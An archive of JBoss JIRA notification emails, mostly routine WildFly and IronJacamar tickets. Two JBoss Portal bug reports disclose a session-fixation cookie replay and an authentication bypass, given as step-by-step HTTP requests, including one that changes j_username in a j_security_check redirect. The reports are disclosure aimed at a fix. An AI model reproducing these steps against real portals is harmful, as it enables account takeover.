[JBoss JIRA] (WFLY-2426) Easily accessible static information describing the release
by Rob Stryker (JIRA)
[ https://issues.jboss.org/browse/WFLY-2426?page=com.atlassian.jira.plugin.... ]
Rob Stryker commented on WFLY-2426:
-----------------------------------
How would this change for distributions that have 1 base and multiple layers installed on it? I've lost the link to the community page with the matrix, but it's my understanding that distributions aren't limited to one layer and that some may have multiple layers.
Would this file then be updated somehow (and how?) if a distribution contained 1 layer but was upgraded to have a second layer?
Is the layer tag assuming that there's only 1 layer, or only 1 primary layer? Is it possible that there might be multiple layers without any one being "in charge"? If that's possible, then it seems a mistake to assume only 1 layer.
> Easily accessible static information describing the release
> -----------------------------------------------------------
>
> Key: WFLY-2426
> URL: https://issues.jboss.org/browse/WFLY-2426
> Project: WildFly
> Issue Type: Feature Request
> Security Level: Public(Everyone can see)
> Components: Server
> Reporter: Brian Stansberry
> Assignee: Ondrej Zizka
> Labels: build, integration, jbds, layers, version
> Fix For: 8.0.0.CR1
>
>
> Tools that work with a WF installation need to identify what they are working with before they can launch or interact with the server. Specifically, they need to know the version. They likely need to know other information as well, such as the name of the software; e.g. whether it is WildFly itself or some other project based on WildFly.
> This information should be provided in standard format in a text file in a standard location in the distribution (probably in bin). The text file should be generated as part of the build.
> The solution to this issue should consider the requirements of other "identities" that may be based on WildFly. See [1] for the definition of an identity.
> The solution to this issue should consider the needs of products based on WildFly and other non-product identities. For example, can the existing product.conf contain the necessary information for a product, with some differently named but largely equivalent file being used in a non-product distribution?
> The solution to this issue should consider the implications for the patching tool.
> [1] https://community.jboss.org/wiki/LayeredDistributionsAndModulePathOrganiz... for
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
10 years, 10 months
[JBoss JIRA] (JBPORTAL-2495) Session Fixation
by Wells guo (JIRA)
Wells guo created JBPORTAL-2495:
-----------------------------------
Summary: Session Fixation
Key: JBPORTAL-2495
URL: https://issues.jboss.org/browse/JBPORTAL-2495
Project: JBoss Portal
Issue Type: Bug
Security Level: Public (Everyone can see)
Environment: EPP 5.1.0
Reporter: Wells guo
Hi ,
Now our security team reported an issue Session Fixation : after user login project on machine A , if i copy cookie JSESSIONID to the machine B , the user on machineB can view the private content of the project ,
so do you have any advice about this issue , thanks !
Steps to Reproduce:
1. Get cookie from the browser on machine A.
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=DWQ6ztJvJeEZA77uVzE3Dg__
^^^^^^^^^^^^^^^^^^^^^^^^
Connection: keep-alive
Cache-Control: max-age=0
2. Clear cookie of browser on machine B.
3. Request project homepage on machine B and modify the set-cookie to A's cookie in the response.
GET XXX HTTP/1.1
Host: XXXXXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 15 Aug 2013 10:45:23 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=DWQ6ztJvJeEZA77uVzE3Dg__; Path=/; Secure
^^^^^^^^^^^^^^^^^^^^^^^^^
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 24896
4. Login in browser of machine B.
Actual results:
Both machine A and B login the project successfully.
Expected results:
Machine A should not login without providing any credential.
Additional info:
Attacker can modify user's cookie by sending a malicious link to user.
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
10 years, 10 months
[JBoss JIRA] (JBPORTAL-2496) bypass authentication
by Wells guo (JIRA)
Wells guo created JBPORTAL-2496:
-----------------------------------
Summary: bypass authentication
Key: JBPORTAL-2496
URL: https://issues.jboss.org/browse/JBPORTAL-2496
Project: JBoss Portal
Issue Type: Bug
Security Level: Public (Everyone can see)
Environment: EPP 5.1.0
Reporter: Wells guo
Steps to Reproduce:
1. Log into our portal project with correct username and password
POST /portal/login HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:http://XXXX/home?portal:componentId=UIPortal&portal:action=Logout
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
initialURI=%2Fportal%2Fprivate%2Fxxxx0%2Fhome&username=userA&password=xxxx
2. Get a 302 response and open the /portal/private/project/home page
HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:19:48 GMT
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Location: http://XXXX//home
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
GET /portal/private/xxxx/home HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX//home?portal:componentId=UIPortal&portal:action=Logout
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
3. Get a 302 response again, which redirect to secure check page with the username, modify the username to someone else that is logged in.
Original message:
HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:29:42 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Location:http://XXXX//portal/private/xxxx/j_security_check?j_username=userA&j_password=rememberme1447024746
^^^^^^^^^^^^^^^^^
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Modified message:
HTTP/1.1 302 Moved Temporarily
Date: Thu, 15 Aug 2013 07:29:42 GMT
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userB&j_pass...
^^^^^^^^^^^^^^^^
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
4. Send GET request to get the page in "Location" of step3, which is with username "userB"
GET /portal/private/xxx/j_security_check?j_username=userB&j_password=rememberme1447024746 HTTP/1.1
^^^^^^^^^^^^^^^^^^
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXX/portal/private/xxxx/home?portal:componentId=UIPortal&portal:a...
Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff
Connection: keep-alive
5. Get the response with code 302 and redirect to home page , attchment1.
6. Click content tab in the home page, it will display now login with "userB", and operations can be performed as userB too,
Actual results:
Successfully bypass authentication.
Expected results:
Should not log into the project with "userB" successfully.
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
10 years, 10 months
[JBoss JIRA] (JBJCA-1124) Eclipse plugin update for resource adapter 1.1
by Lin Gao (JIRA)
[ https://issues.jboss.org/browse/JBJCA-1124?page=com.atlassian.jira.plugin... ]
Lin Gao updated JBJCA-1124:
---------------------------
Description:
Update eclipse plugin with new features included in resource adapter 1.1 schema, which includes:
* an id attribute in resource-adapter
* work manager security configuration
* initial-pool-size for the pool configuration
* capacity for the pool configuration
* sharable and enlistment for MCF
was:
Update eclipse plugin with new features included in resource adapter 1.1 schema, which includes:
* an id attribute in resource-adapter
* work manager security configuration
* initial-pool-size for the pool configuration
* capacity for the pool configuration
> Eclipse plugin update for resource adapter 1.1
> ----------------------------------------------
>
> Key: JBJCA-1124
> URL: https://issues.jboss.org/browse/JBJCA-1124
> Project: IronJacamar
> Issue Type: Task
> Components: Eclipse
> Reporter: Lin Gao
> Assignee: Lin Gao
>
> Update eclipse plugin with new features included in resource adapter 1.1 schema, which includes:
> * an id attribute in resource-adapter
> * work manager security configuration
> * initial-pool-size for the pool configuration
> * capacity for the pool configuration
> * sharable and enlistment for MCF
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
10 years, 10 months
[JBoss JIRA] (WFLY-2623) Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
by Amos Feng (JIRA)
[ https://issues.jboss.org/browse/WFLY-2623?page=com.atlassian.jira.plugin.... ]
Amos Feng updated WFLY-2623:
----------------------------
Description:
https://bugzilla.redhat.com/show_bug.cgi?id=1036739
process-id mechanism can not be changed from process-id-uuid to process-id-socket-binding.
The following ERROR occurred at JBoss start-up:
{noformat}
ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
{noformat}
The root reason is it does not check the PROCESS_ID_UUID if defined when booting the coreEnvironment service in TransactionSubsytemAdd.
was:
process-id mechanism can not be changed from process-id-uuid to process-id-socket-binding.
The following ERROR occurred at JBoss start-up:
{noformat}
ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
{noformat}
The root reason is it does not check the PROCESS_ID_UUID if defined when booting the coreEnvironment service in TransactionSubsytemAdd.
> Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
> -------------------------------------------------------------------------------------------------------
>
> Key: WFLY-2623
> URL: https://issues.jboss.org/browse/WFLY-2623
> Project: WildFly
> Issue Type: Bug
> Security Level: Public(Everyone can see)
> Components: Transactions
> Reporter: Amos Feng
> Assignee: Amos Feng
> Labels: transaction
> Fix For: 8.0.0.CR1
>
>
> https://bugzilla.redhat.com/show_bug.cgi?id=1036739
> process-id mechanism can not be changed from process-id-uuid to process-id-socket-binding.
> The following ERROR occurred at JBoss start-up:
> {noformat}
> ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
> {noformat}
> The root reason is it does not check the PROCESS_ID_UUID if defined when booting the coreEnvironment service in TransactionSubsytemAdd.
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
10 years, 10 months
[JBoss JIRA] (WFLY-2623) Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
by Amos Feng (JIRA)
[ https://issues.jboss.org/browse/WFLY-2623?page=com.atlassian.jira.plugin.... ]
Amos Feng updated WFLY-2623:
----------------------------
Labels: transaction (was: )
> Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
> -------------------------------------------------------------------------------------------------------
>
> Key: WFLY-2623
> URL: https://issues.jboss.org/browse/WFLY-2623
> Project: WildFly
> Issue Type: Bug
> Security Level: Public(Everyone can see)
> Components: Transactions
> Reporter: Amos Feng
> Assignee: Amos Feng
> Labels: transaction
> Fix For: 8.0.0.CR1
>
>
> process-id mechanism can not be changed from process-id-uuid to process-id-socket-binding.
> The following ERROR occurred at JBoss start-up:
> {noformat}
> ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
> {noformat}
> The root reason is it does not check the PROCESS_ID_UUID if defined when booting the coreEnvironment service in TransactionSubsytemAdd.
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
10 years, 10 months
[JBoss JIRA] (WFLY-2623) Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
by Amos Feng (JIRA)
Amos Feng created WFLY-2623:
-------------------------------
Summary: Unable to change process-id mechanism from process-id-uuid to process-id-socket-binding on transaction
Key: WFLY-2623
URL: https://issues.jboss.org/browse/WFLY-2623
Project: WildFly
Issue Type: Bug
Security Level: Public (Everyone can see)
Components: Transactions
Reporter: Amos Feng
Assignee: Amos Feng
Fix For: 8.0.0.CR1
process-id mechanism can not be changed from process-id-uuid to process-id-socket-binding.
The following ERROR occurred at JBoss start-up:
{noformat}
ERROR [org.jboss.as.controller.management-operation] (ServerService Thread Pool -- 44) JBAS014613: Operation ("add") failed - address: ([("subsystem" => "transactions")]) - failure description: "JBAS014746: process-id-uuid may not be null"
{noformat}
The root reason is it does not check the PROCESS_ID_UUID if defined when booting the coreEnvironment service in TransactionSubsytemAdd.
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira
10 years, 10 months